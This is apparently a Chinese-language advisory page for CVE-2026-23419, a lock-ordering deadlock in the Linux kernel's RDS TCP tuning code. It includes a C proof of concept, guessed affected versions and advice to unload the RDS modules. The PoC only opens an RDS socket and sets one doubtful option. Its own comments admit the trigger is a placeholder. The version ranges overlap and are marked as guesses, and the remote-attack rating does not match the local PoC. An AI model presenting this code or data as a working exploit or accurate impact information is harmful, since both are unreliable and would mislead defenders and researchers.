CVE-2026-23419 CVSS 7.5 高危

CVE-2026-23419 Linux内核net/rds死锁漏洞

披露日期: 2026-04-03

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23419

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核net/rds组件在处理TCP连接调优时存在死锁漏洞。问题出在rds_tcp_tune函数中，当持有socket锁时调用sk_net_refcnt_upgrade()进行内存分配，触发了与fs_reclaim锁的循环依赖。本地或远程攻击者可利用该缺陷导致系统内核死锁或崩溃，造成拒绝服务。

技术细节

该漏洞源于Linux内核net/rds子系统的rds_tcp_tune函数实现不当。函数在执行过程中持有socket锁（k-sk_lock-AF_INET6），同时调用了sk_net_refcnt_upgrade()。后者通过get_net_track()和ref_tracker_alloc()触发内核内存分配（__kmalloc）。内存分配可能触发fs_reclaim操作，需要获取fs_reclaim锁。由于其他代码路径可能先持有fs_reclaim锁再尝试获取socket锁，从而形成了“Socket锁 -> fs_reclaim锁”与“fs_reclaim锁 -> Socket锁”的闭环依赖。这种死锁会导致挂起的工作线程无法继续执行，最终耗尽系统资源或导致内核崩溃。修复方案是将sk_net_refcnt_upgrade()的调用移出socket锁的保护范围，因为此时并发代码路径不会访问其修改的字段。

攻击链分析

STEP 1

1. 初始访问

攻击者需要能够触发Linux内核中的RDS模块代码路径，通常通过网络数据包或本地系统调用。

STEP 2

2. 触发漏洞

攻击者发送特定的网络流量或执行特定操作，导致内核执行rds_tcp_tune函数。

STEP 3

3. 死锁形成

函数在持有socket锁的情况下调用sk_net_refcnt_upgrade()，尝试进行内存分配（fs_reclaim），形成循环锁依赖。

STEP 4

4. 拒绝服务

内核工作线程陷入死锁，无法处理其他请求，导致系统卡死或崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-23419
 * This code attempts to trigger the deadlock in rds_tcp_tune.
 * It creates an RDS socket and sets options to trigger the tuning path.
 * Compile: gcc -o poc_rds poc_rds.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/rds.h>

int main() {
    int sockfd;
    // Create an RDS socket over TCP
    sockfd = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (sockfd < 0) {
        perror("socket");
        return 1;
    }

    printf("[+] RDS Socket created. Triggering rds_tcp_tune...\n");

    // Attempt to trigger socket options that lead to rds_tcp_tune
    // The exact option depends on kernel configuration, but typically involves buffer sizes or cong settings.
    int val = 1024;
    // This is a placeholder for the specific syscall sequence that hits rds_tcp_tune
    // while holding the lock and forcing a memory upgrade.
    if (setsockopt(sockfd, SOL_RDS, SO_RDS_RECVBUF, &val, sizeof(val)) < 0) {
        perror("setsockopt");
        // Not critical for PoC demonstration as the trigger might be internal
    }

    // In a real exploit scenario, concurrent operations would be needed to
    // race for the fs_reclaim lock.
    sleep(1);
    close(sockfd);
    return 0;
}

影响范围

Linux Kernel < 6.6 (推测)

Linux Kernel < 6.1 (推测)

防御指南

临时缓解措施

如果无法立即升级，建议禁用RDS模块（执行 rmmod rds_tcp 和 rds），或限制对RDS端口的网络访问以减少攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表